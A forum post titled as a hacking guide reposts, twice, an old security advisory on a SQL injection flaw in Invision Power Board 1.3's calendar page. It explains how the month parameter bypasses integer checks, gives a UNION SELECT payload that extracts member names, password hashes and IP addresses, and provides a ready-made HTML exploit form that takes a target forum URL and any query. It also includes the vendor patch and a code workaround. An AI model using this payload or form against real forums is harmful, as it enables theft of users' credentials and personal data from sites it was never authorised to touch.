how to hack A ipb portal by wolf and emp

emper0r · 03-30-2006

curity Corporation Security Advisory [SCSA-025]

Invision Power Board SQL Injection Vulnerability
================================================== ====================

PROGRAM: Invision Power Board
HOMEPAGE: <a href=\'http://www.invisionboard.com\' target=\'_blank\'>http://www.invisionboard.com</a>
VULNERABLE VERSIONS: 1.3 FINAL
RISK: MEDIUM/HIGH
IMPACT: SQL Injection

RELEASE DATE: 2004-01-03

================================================== ====================
TABLE OF CONTENTS
================================================== ====================

1................................................. .........DESCRIPTION
2................................................. .............DETAILS
3................................................. ............EXPLOITS
4................................................. ...........SOLUTIONS
5................................................. ..........WORKAROUND
6................................................. .DISCLOSURE TIMELINE
7................................................. .............CREDITS
8................................................. ..........DISCLAIMER
9................................................. ..........REFERENCES
10................................................ ............FEEDBACK

1. DESCRIPTION
================================================== ====================

Invision Power Board (IPB) is a professional forum system that has been built from the ground up with speed and security in mind, taking advantage of object oriented code, highly-optimized SQL queries, and the fast PHP engine. A comprehensive administration control panel is included to help you keep your board running smoothly. Moderators will also enjoy the full range of options available to them via built-in tools and moderators control panel. Members will appreciate the ability to subscribe to topics, send private messages, and perform a host of other options through the user control panel. It is used by millions of people over the world.

2. DETAILS
================================================== ====================

- SQL Injection :

A vulnerability has been discovered in the sources/calendar.php file that allows unauthorized users to inject SQL commands.

Vulnerable code :

----------------------------------------------------
[...]

$this->chosen_month = ( ! intval($ibforums->input['m']) ) ?
$this->now_date['mon'] : $ibforums->input['m'];

[...]

$recurring = array();

[...]

$DB->query("SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND
month={$this->chosen_month}) )
");

while ( $rec = $DB->fetch_row() )
{
$recurring[] = $rec;
}

$events = array();

$DB->query("SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month={$this->chosen_month} AND year={$this->chosen_year} OR (event_ranged=1 AND ( unix_stamp < $timenow AND end_unix_stamp
> $timenow ) )
");
----------------------------------------------------

$ibforums->input['m'] is the variable $m which was sent by the user.

We see that if intval($ibforums->input['m']) doesn't return numerical value, then the variable $this->chosen_month will be worth the number of the month in which we are.

However if it returns a numerical value, then $this->chosen_month will have for value that brought in by the user, that of $ibforums->input['m'].

This will have for consequence that, if we enter as value in $m for example 'aaaaa', $this->chosen_month will see attributing a value by default to the script. A priori we cannot thus enter another thing than number.

But, if intval('aaaa') do not return numerical value, intval('2aaaaa') returns one! The argument just has thus to BEGIN with a number.

Thus if we give in $m the value '2hophophop', $this->chosen_month will be '2hophophop'

We execute the following request :

------------------------------------------------------------------------
SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN
('w','m') OR (repeat_unit='y' AND month={$this->chosen_month}) )
------------------------------------------------------------------------

As it is a request of type SELECT, we can use for example the clause UNION.

As the result of the second request has to be the same type as the first one, and as in the first one we extract everything (*) the elements of the table ibf_calendar_events, we need to know its structure, which is :

-------------------------------------------------------
CREATE TABLE ibf_calendar_events (
eventid mediumint(8) NOT NULL auto_increment, userid mediumint(8) NOT NULL default '0', year int(4) NOT NULL default '2002', month int(2) NOT NULL default '1', mday int(2) NOT NULL default '1', title varchar(254) NOT NULL default 'no title', event_text text NOT NULL, read_perms varchar(254) NOT NULL default '*', unix_stamp int(10) NOT NULL default '0', priv_event tinyint(1) NOT NULL default '0', show_emoticons tinyint(1) NOT NULL default '1', rating smallint(2) NOT NULL default '1', event_ranged tinyint(1) NOT NULL default '0', event_repeat tinyint(1) NOT NULL default '0', repeat_unit char(2) NOT NULL default '', end_day int(2) default NULL, end_month int(2) default NULL, end_year int(4) default NULL, end_unix_stamp int(10) default NULL, event_bgcolor varchar(32) NOT NULL default '', event_color varchar(32) NOT NULL default '', PRIMARY KEY (eventid), KEY unix_stamp (unix_stamp) );
-------------------------------------------------------

We can see that the result of the request should be :
INT,INT,INT,INT,INT,VARCHAR,TEXT,VARCHAR,INT,INT,I NT,INT,INT,INT,CHAR(2),INT,
INT,INT,INT,VARCHAR,VARCHAR

Thus if we give in $this->chosen_month (in $m) the value:
2 )) UNION SELECT
0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0, 0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1/*

The request executed will be :
SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN
('w','m') OR (repeat_unit='y' AND month=2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0, 0,0,0,0,0,0,0,f.id,f.name,
f.password FROM ibf_members m,ibf_forums f WHERE 1/*)

And these two requests will be executed:
- SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month=2 ))
- SELECT
0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0, 0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1

The second request returns four 0, the id, the name, the password and the ip of the member with thirteen 0 for every member.

ATTENTION! The request is executed but nothing is displayed!

Indeed, later in the script another request is executed:
SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month={$this->chosen_month} AND year={$this->chosen_year} OR (event_ranged=1 AND ( unix_stamp < $timenow AND end_unix_stamp > $timenow ) )

What gives the execution of :
SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month= 2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0, 0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1/*

What generates an error. But the request is executed first time, and there are naturally other possible uses.

3. EXPLOITS
================================================== ====================

- SQL Injection :

--------------------IPBexploit.html--------------------

<html>
<head><title>
Invision Power Board Free 1.3 FINAL SQL Injection Problems </title></head> <body> <form action='/index.php?act=calendar' method='post'
onsubmit="this.m.value='2 )) UNION
'+this.request.value+'#';this.action=this.url.valu e+this.action;">
IPB directory URL : <input type='text' size='45' name='url'
value='http://forum.target.com'>

SQL SELECT REQUEST : <input type='text' size='80' name='request'
value='SELECT * FROM ibf_calendar_events'>

Attention : The request result MUST have this structure :

INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,IN T,INT,CHAR(2),INT,INT,
INT,INT,STR,STR

<input type='hidden' name='y' value='2004'> <input type='hidden' name='m'> <input type='submit' value='Execute'> </form>

<p align="right">A patch can be found on phpSecure.info.

For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-025.html"
target="_blank">
Security-Corporation.com</a></p>
</body>
</html>

--------------------IPBexploit.html--------------------

4. SOLUTIONS
================================================== ====================

You can found patch at the following link : <a href=\'http://www.phpsecure.info\' target=\'_blank\'>http://www.phpsecure.info</a>

The Invision Power Services was notified and have released a fix :
<a href=\'http://forums.invisionpower.com/index.php?act=ST&f=1&t=108786\' target=\'_blank\'>http://forums.invisionpower.com/index.php?...ST&f=1&t=108786</a>

5. WORKAROUND
================================================== ====================

In sources/calendar.php replace the following lines :

------------------------------------------------------------------------
$this->chosen_month = ( ! intval($ibforums->input['m']) ) ?
$this->now_date['mon'] : $ibforums->input['m']; $this->chosen_year = ( ! intval($ibforums->input['y']) ) ?
$this->now_date['year'] : $ibforums->input['y'];
------------------------------------------------------------------------

by :

------------------------------------------------------------------------
$this->chosen_month = ( ! intval($ibforums->input['m']) ) ?
$this->now_date['mon'] : intval($ibforums->input['m']); $this->chosen_year = ( ! intval($ibforums->input['y']) ) ?
$this->now_date['year'] : intval($ibforums->input['y']);
------------------------------------------------------------------------

6. DISCLOSURE TIMELINE
================================================== ====================

30/12/2003 Vulnerability discovered
30/12/2003 Vendor notified
02/01/2004 Vendor response
02/01/2004 Security Corporation clients notified
02/01/2004 Started e-mail discussions
03/01/2004 Last e-mail received
03/01/2004 Public disclosure

7. CREDITS
================================================== ====================

emper0r,Wolf

8. DISCLAIMER
================================================== ====================

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

9. REFERENCES
================================================== ====================

- Original Version:
<a href=\'http://www.security-corporation.com/advisories-025.html\' target=\'_blank\'>http://www.security-corporation.com/advisories-025.html</a>

- Version Française:
<a href=\'http://www.security-corporation.com/index.php?id=advisories&a=025-FR\' target=\'_blank\'>http://www.security-corporation.com/index....sories&a=025-FR</a>

10. FEEDBACK
================================================== ====================

Please send suggestions, updates, and comments to:

emper0r

03-30-2006	#1 (permalink)
emper0r Senior Member Join Date: Mar 2006 Location: :::::........h3LL.......:::::::: Age: 23 Posts: 105 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 101	curity Corporation Security Advisory [SCSA-025] Invision Power Board SQL Injection Vulnerability ================================================== ==================== PROGRAM: Invision Power Board HOMEPAGE: <a href=\'http://www.invisionboard.com\' target=\'_blank\'>http://www.invisionboard.com</a> VULNERABLE VERSIONS: 1.3 FINAL RISK: MEDIUM/HIGH IMPACT: SQL Injection RELEASE DATE: 2004-01-03 ================================================== ==================== TABLE OF CONTENTS ================================================== ==================== 1................................................. .........DESCRIPTION 2................................................. .............DETAILS 3................................................. ............EXPLOITS 4................................................. ...........SOLUTIONS 5................................................. ..........WORKAROUND 6................................................. .DISCLOSURE TIMELINE 7................................................. .............CREDITS 8................................................. ..........DISCLAIMER 9................................................. ..........REFERENCES 10................................................ ............FEEDBACK 1. DESCRIPTION ================================================== ==================== Invision Power Board (IPB) is a professional forum system that has been built from the ground up with speed and security in mind, taking advantage of object oriented code, highly-optimized SQL queries, and the fast PHP engine. A comprehensive administration control panel is included to help you keep your board running smoothly. Moderators will also enjoy the full range of options available to them via built-in tools and moderators control panel. Members will appreciate the ability to subscribe to topics, send private messages, and perform a host of other options through the user control panel. It is used by millions of people over the world. 2. DETAILS ================================================== ==================== - SQL Injection : A vulnerability has been discovered in the sources/calendar.php file that allows unauthorized users to inject SQL commands. Vulnerable code : ---------------------------------------------------- [...] $this->chosen_month = ( ! intval($ibforums->input['m']) ) ? $this->now_date['mon'] : $ibforums->input['m']; [...] $recurring = array(); [...] $DB->query("SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month={$this->chosen_month}) ) "); while ( $rec = $DB->fetch_row() ) { $recurring[] = $rec; } $events = array(); $DB->query("SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month={$this->chosen_month} AND year={$this->chosen_year} OR (event_ranged=1 AND ( unix_stamp < $timenow AND end_unix_stamp > $timenow ) ) "); ---------------------------------------------------- $ibforums->input['m'] is the variable $m which was sent by the user. We see that if intval($ibforums->input['m']) doesn't return numerical value, then the variable $this->chosen_month will be worth the number of the month in which we are. However if it returns a numerical value, then $this->chosen_month will have for value that brought in by the user, that of $ibforums->input['m']. This will have for consequence that, if we enter as value in $m for example 'aaaaa', $this->chosen_month will see attributing a value by default to the script. A priori we cannot thus enter another thing than number. But, if intval('aaaa') do not return numerical value, intval('2aaaaa') returns one! The argument just has thus to BEGIN with a number. Thus if we give in $m the value '2hophophop', $this->chosen_month will be '2hophophop' We execute the following request : ------------------------------------------------------------------------ SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month={$this->chosen_month}) ) ------------------------------------------------------------------------ As it is a request of type SELECT, we can use for example the clause UNION. As the result of the second request has to be the same type as the first one, and as in the first one we extract everything () the elements of the table ibf_calendar_events, we need to know its structure, which is : ------------------------------------------------------- CREATE TABLE ibf_calendar_events ( eventid mediumint(8) NOT NULL auto_increment, userid mediumint(8) NOT NULL default '0', year int(4) NOT NULL default '2002', month int(2) NOT NULL default '1', mday int(2) NOT NULL default '1', title varchar(254) NOT NULL default 'no title', event_text text NOT NULL, read_perms varchar(254) NOT NULL default '', unix_stamp int(10) NOT NULL default '0', priv_event tinyint(1) NOT NULL default '0', show_emoticons tinyint(1) NOT NULL default '1', rating smallint(2) NOT NULL default '1', event_ranged tinyint(1) NOT NULL default '0', event_repeat tinyint(1) NOT NULL default '0', repeat_unit char(2) NOT NULL default '', end_day int(2) default NULL, end_month int(2) default NULL, end_year int(4) default NULL, end_unix_stamp int(10) default NULL, event_bgcolor varchar(32) NOT NULL default '', event_color varchar(32) NOT NULL default '', PRIMARY KEY (eventid), KEY unix_stamp (unix_stamp) ); ------------------------------------------------------- We can see that the result of the request should be : INT,INT,INT,INT,INT,VARCHAR,TEXT,VARCHAR,INT,INT,I NT,INT,INT,INT,CHAR(2),INT, INT,INT,INT,VARCHAR,VARCHAR Thus if we give in $this->chosen_month (in $m) the value: 2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0, 0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1/* The request executed will be : SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month=2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0, 0,0,0,0,0,0,0,f.id,f.name, f.password FROM ibf_members m,ibf_forums f WHERE 1/) And these two requests will be executed: - SELECT FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month=2 )) - SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0, 0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1 The second request returns four 0, the id, the name, the password and the ip of the member with thirteen 0 for every member. ATTENTION! The request is executed but nothing is displayed! Indeed, later in the script another request is executed: SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month={$this->chosen_month} AND year={$this->chosen_year} OR (event_ranged=1 AND ( unix_stamp < $timenow AND end_unix_stamp > $timenow ) ) What gives the execution of : SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month= 2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0, 0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1/* What generates an error. But the request is executed first time, and there are naturally other possible uses. 3. EXPLOITS ================================================== ==================== - SQL Injection : --------------------IPBexploit.html-------------------- <html> <head><title> Invision Power Board Free 1.3 FINAL SQL Injection Problems </title></head> <body> <form action='/index.php?act=calendar' method='post' onsubmit="this.m.value='2 )) UNION '+this.request.value+'#';this.action=this.url.valu e+this.action;"> IPB directory URL : <input type='text' size='45' name='url' value='http://forum.target.com'> SQL SELECT REQUEST : <input type='text' size='80' name='request' value='SELECT * FROM ibf_calendar_events'> Attention : The request result MUST have this structure : INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,IN T,INT,CHAR(2),INT,INT, INT,INT,STR,STR <input type='hidden' name='y' value='2004'> <input type='hidden' name='m'> <input type='submit' value='Execute'> </form> <p align="right">A patch can be found on phpSecure.info. For more informations about this exploit : <a href="http://www.security-corporation.com/advisories-025.html" target="_blank"> Security-Corporation.com</a></p> </body> </html> --------------------IPBexploit.html-------------------- 4. SOLUTIONS ================================================== ==================== You can found patch at the following link : <a href=\'http://www.phpsecure.info\' target=\'_blank\'>http://www.phpsecure.info</a> The Invision Power Services was notified and have released a fix : <a href=\'http://forums.invisionpower.com/index.php?act=ST&f=1&t=108786\' target=\'_blank\'>http://forums.invisionpower.com/index.php?...ST&f=1&t=108786</a> 5. WORKAROUND ================================================== ==================== In sources/calendar.php replace the following lines : ------------------------------------------------------------------------ $this->chosen_month = ( ! intval($ibforums->input['m']) ) ? $this->now_date['mon'] : $ibforums->input['m']; $this->chosen_year = ( ! intval($ibforums->input['y']) ) ? $this->now_date['year'] : $ibforums->input['y']; ------------------------------------------------------------------------ by : ------------------------------------------------------------------------ $this->chosen_month = ( ! intval($ibforums->input['m']) ) ? $this->now_date['mon'] : intval($ibforums->input['m']); $this->chosen_year = ( ! intval($ibforums->input['y']) ) ? $this->now_date['year'] : intval($ibforums->input['y']); ------------------------------------------------------------------------ 6. DISCLOSURE TIMELINE ================================================== ==================== 30/12/2003 Vulnerability discovered 30/12/2003 Vendor notified 02/01/2004 Vendor response 02/01/2004 Security Corporation clients notified 02/01/2004 Started e-mail discussions 03/01/2004 Last e-mail received 03/01/2004 Public disclosure 7. CREDITS ================================================== ==================== emper0r,Wolf 8. DISCLAIMER ================================================== ==================== The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. 9. REFERENCES ================================================== ==================== - Original Version: <a href=\'http://www.security-corporation.com/advisories-025.html\' target=\'_blank\'>http://www.security-corporation.com/advisories-025.html</a> - Version Française: <a href=\'http://www.security-corporation.com/index.php?id=advisories&a=025-FR\' target=\'_blank\'>http://www.security-corporation.com/index....sories&a=025-FR</a> 10. FEEDBACK ================================================== ==================== Please send suggestions, updates, and comments to: emper0r __________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. <div class=\'quotetop\'>QUOTE</div><div class=\'quotemain\'>.....:::We work in the Dark , we Get what we want ... Our curiosity is our passion & our passion is our task ... The rest is the Madnes of Art b'cos knowledge is not of anyones monopoly:::..... </div>

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
F8: Facebook Is The Portal 2.0	Armageddon	World News	1	07-29-2008 01:58 AM
The Mystery of the Crystal Portal	Insurrection	Full Games	0	07-27-2008 05:40 PM
Nancy Drew: The white Wolf of Icicle Creek	CH@OS_K!NG	Full Games	0	06-20-2008 04:01 AM
PORTAL (standalone) (350mb)	Armageddon	Full Games	1	05-05-2008 08:34 AM
Brotherhood of the Wolf (2001) DVDRip	rvk19	Hollywood Movies	0	06-16-2007 10:57 AM

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)